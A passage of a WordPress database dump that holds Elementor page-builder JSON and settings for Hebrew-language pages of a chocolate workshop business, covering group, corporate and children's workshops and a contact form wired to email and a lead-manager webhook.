fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05e9\\u05d2\\u05dd \\u05ea\\u05d0\\u05db\\u05dc\\u05d5 \\u05d5\\u05d2\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05de\\u05d4 \\u05e9\\u05e0\\u05e9\\u05d0\\u05e8\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05d0\\u05d9\\u05df \\u05d2\\u05d1\\u05d5\\u05dc \\u05dc\\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd, \\u05d4\\u05d7\\u05dc\\u05d8\\u05d4 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05e9\\u05dc\\u05db\\u05df\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"e628903\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"00f8f5a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1865,375,'_elementor_version','2.7.5'),(1866,375,'_elementor_pro_version','2.7.3'),(1867,375,'_elementor_controls_usage','a:8:{s:11:\"breadcrumbs\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:15:\"stretch_section\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:3;s:11:\"header_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:3;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:1:{s:7:\"content\";a:7:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:10:\"input_size\";i:1;s:11:\"show_labels\";i:1;}s:21:\"section_submit_button\";a:1:{s:11:\"button_text\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:1;}s:15:\"section_webhook\";a:1:{s:8:\"webhooks\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:10:\"icon_align\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:1;}s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_line_height\";i:1;}}}}}'),(1869,376,'_wp_page_template','elementor_header_footer'),(1870,376,'_elementor_edit_mode','builder'),(1871,376,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"bebc84a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34824&lm_key=fa721ea141794a3db374e600fc05ee2c\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1872,376,'_elementor_version','2.7.5'),(1873,376,'_elementor_template_type','wp-post'),(1874,376,'_elementor_pro_version','2.7.3'),(1875,376,'_elementor_controls_usage','a:8:{s:11:\"breadcrumbs\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:27:\"section_breadcrumbs_content\";a:1:{s:5:\"align\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:6:{s:21:\"typography_typography\";i:1;s:22:\"typography_font_family\";i:1;s:20:\"typography_font_size\";i:1;s:22:\"typography_font_weight\";i:1;s:26:\"typography_text_decoration\";i:1;s:10:\"text_color\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:5;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:4;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:6:\"layout\";a:2:{s:14:\"section_layout\";a:1:{s:15:\"stretch_section\";i:1;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:2;}}s:5:\"style\";a:1:{s:18:\"section_background\";a:2:{s:21:\"background_background\";i:2;s:16:\"background_color\";i:2;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:3;s:11:\"header_size\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"image\";i:2;s:10:\"image_size\";i:1;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:2;}}}}s:4:\"form\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:4;s:8:\"controls\";a:1:{s:7:\"content\";a:7:{s:19:\"section_form_fields\";a:4:{s:9:\"form_name\";i:1;s:11:\"form_fields\";i:1;s:10:\"input_size\";i:1;s:11:\"show_labels\";i:1;}s:21:\"section_submit_button\";a:1:{s:11:\"button_text\";i:1;}s:13:\"section_email\";a:3:{s:13:\"email_subject\";i:1;s:10:\"email_from\";i:1;s:15:\"email_from_name\";i:1;}s:15:\"section_email_2\";a:3:{s:15:\"email_subject_2\";i:1;s:12:\"email_from_2\";i:1;s:17:\"email_from_name_2\";i:1;}s:20:\"section_form_options\";a:4:{s:15:\"success_message\";i:1;s:13:\"error_message\";i:1;s:22:\"required_field_message\";i:1;s:15:\"invalid_message\";i:1;}s:19:\"section_integration\";a:1:{s:14:\"submit_actions\";i:1;}s:15:\"section_webhook\";a:1:{s:8:\"webhooks\";i:1;}}}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}s:5:\"style\";a:3:{s:17:\"section_icon_list\";a:1:{s:10:\"icon_align\";i:1;}s:18:\"section_icon_style\";a:1:{s:9:\"icon_size\";i:1;}s:18:\"section_text_style\";a:4:{s:11:\"text_indent\";i:1;s:26:\"icon_typography_typography\";i:1;s:25:\"icon_typography_font_size\";i:1;s:27:\"icon_typography_line_height\";i:1;}}}}}'),(1877,377,'_wp_page_template','elementor_header_footer'),(1878,377,'_elementor_edit_mode','builder'),(1879,377,'_elementor_data','[{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 